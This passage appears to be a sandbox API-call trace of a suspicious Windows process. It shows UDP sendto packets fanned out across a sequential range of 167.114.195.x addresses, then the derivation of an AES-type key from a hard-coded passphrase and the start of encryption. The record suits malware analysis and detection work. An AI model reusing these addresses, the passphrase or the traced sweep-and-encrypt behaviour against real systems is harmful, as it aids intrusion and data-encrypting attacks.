349 [0045.262] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.91"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.262] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.92"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.263] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.93"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.263] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.94"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.263] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.95"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.263] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.96"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.264] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.97"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.264] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.98"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.264] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.99"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.265] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.100"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.265] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.101"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.265] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.102"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.265] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.103"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.265] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.104"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.266] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.105"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.266] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.106"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.266] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.107"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.266] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.108"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.267] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.109"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.267] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.110"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.267] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.111"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.267] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.112"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.267] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.113"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.268] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.114"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.268] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.115"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.268] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.116"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.268] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.117"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.268] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.118"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.269] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.119"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.269] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.120"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.269] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.121"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.269] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.122"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.270] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.123"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.270] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.124"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.270] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.125"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.270] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.126"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.270] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.127"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.271] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.128"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.271] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.129"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.271] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.130"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.271] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.131"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.271] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.132"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.272] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.133"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.272] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.134"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.272] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.135"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.272] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.136"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.272] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.137"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.273] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.138"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.273] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.139"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.273] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.140"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.273] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.141"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.274] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.142"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.274] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.143"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.274] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.144"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.274] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.145"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.274] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.146"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.275] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.147"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.275] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.148"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.275] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.149"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.275] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.150"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.275] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.151"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.276] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.152"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.276] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.153"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.276] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.154"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.276] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.155"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.277] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.156"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.277] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.157"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.277] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.158"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.277] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.159"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.277] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.160"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.278] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.161"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.278] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.162"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.278] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.163"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.278] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.164"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.278] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.165"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.279] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.166"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.279] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.167"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.279] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.168"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.279] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.169"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.280] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.170"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.280] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.171"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.280] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.172"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.281] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.173"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.281] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.174"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.281] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.175"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.281] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.176"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.281] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.177"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.282] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.178"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.282] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.179"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.282] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.180"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.282] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.181"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.283] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.182"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.283] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.183"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.283] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.184"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.283] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.185"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.283] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.186"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.284] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.187"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.284] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.188"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.284] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.189"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.284] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.190"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.284] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.191"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.285] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.192"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.285] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.193"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.285] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.194"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.285] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.195"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.286] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.196"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.286] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.197"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.286] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.198"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.286] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.199"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.286] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.200"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.287] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.201"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.287] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.202"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.287] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.203"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.287] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.204"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.287] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.205"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.288] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.206"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.288] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.207"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.288] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.208"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.288] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.209"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.289] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.210"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.289] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.211"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.289] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.212"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.289] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.213"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.289] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.214"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.290] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.215"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.290] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.216"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.290] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.217"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.290] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.218"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.291] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.219"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.391] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x4013e0, phModule=0x285f5c | out: phModule=0x285f5c*=0x400000) returned 1 [0045.391] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x42722b, lpParameter=0x285f50, dwCreationFlags=0x0, lpThreadId=0x12f0f4 | out: lpThreadId=0x12f0f4*=0xa54) returned 0xc0 [0045.391] SleepConditionVariableSRW (in: ConditionVariable=0x29f164, SRWLock=0x286f28, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x29f164, SRWLock=0x286f28) returned 1 [0045.393] GetCurrentThreadId () returned 0xa48 [0045.394] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0045.394] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0045.394] GetProcAddress (hModule=0x769f0000, lpProcName="CryptDestroyHash") returned 0x769fdf66 [0045.394] GetProcAddress (hModule=0x769f0000, lpProcName="CryptDestroyKey") returned 0x769fc51a [0045.394] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0045.394] CryptAcquireContextW (in: phProv=0x12f12c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12f12c*=0x28f088) returned 1 [0045.395] GetProcAddress (hModule=0x769f0000, lpProcName="CryptCreateHash") returned 0x769fdf4e [0045.395] CryptCreateHash (in: hProv=0x28f088, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12f134 | out: phHash=0x12f134) returned 1 [0045.395] GetProcAddress (hModule=0x769f0000, lpProcName="CryptHashData") returned 0x769fdf36 [0045.395] lstrlenW (lpString="WrEYnYmJlugbleTWEvWQF") returned 21 [0045.395] CryptHashData (hHash=0x29fed0, pbData=0x286f20, dwDataLen=0x15, dwFlags=0x0) returned 1 [0045.395] GetProcAddress (hModule=0x769f0000, lpProcName="CryptDeriveKey") returned 0x76a33188 [0045.396] CryptDeriveKey (in: hProv=0x28f088, Algid=0x660e, hBaseData=0x29fed0, dwFlags=0x0, phKey=0x12f130 | out: phKey=0x12f130*=0x29ff10) returned 1 [0045.398] GetProcAddress (hModule=0x769f0000, lpProcName="CryptEncrypt") returned 0x76a1779b [0045.398] 